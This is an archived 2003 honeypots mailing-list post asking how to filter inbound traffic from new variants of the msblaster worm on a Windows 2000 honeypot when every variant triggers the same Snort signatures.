Honeypots mailing list archives
Filtering traffic for variants
From: <shrink-wrap () hushmail com>
Date: 18 Aug 2003 16:58:35 -0000
Hi, Since this has been a problem for myself lately I was wondering if anyone on this list might have some insight on this issue. The problem is that I want to weed out the known bad traffic from the unknown bad traffic as it comes inbound. An example is in order: -Windows 2k Honeypot -SP4 patched -no RPC DCOM patch -gets compromised by msblaster/lovesan (variant A) -traffic filtered (per control requirement) outbound -variant B comes along and can't infect because of previous activity (actively filtered or, eventually, honeypot patched [to stop variant A- i.e. waste of time]) With this example it isn't easy to use snort-inline since the exploits used in the worm and its variants are the same (thus the signatures that will fire are the same). And this problem is the same with any worm (at least)- IIS ISAPI .printer vulnerability ;) Obviously GenI controls don't handle this type of problem since the control (normally firewall) isn't very dynamic while GenII normally doesn't filter incoming- it processes outgoing (for a good reason). Has anyone set up something to do this? S-W
Current thread:
- Filtering traffic for variants shrink-wrap (Aug 18)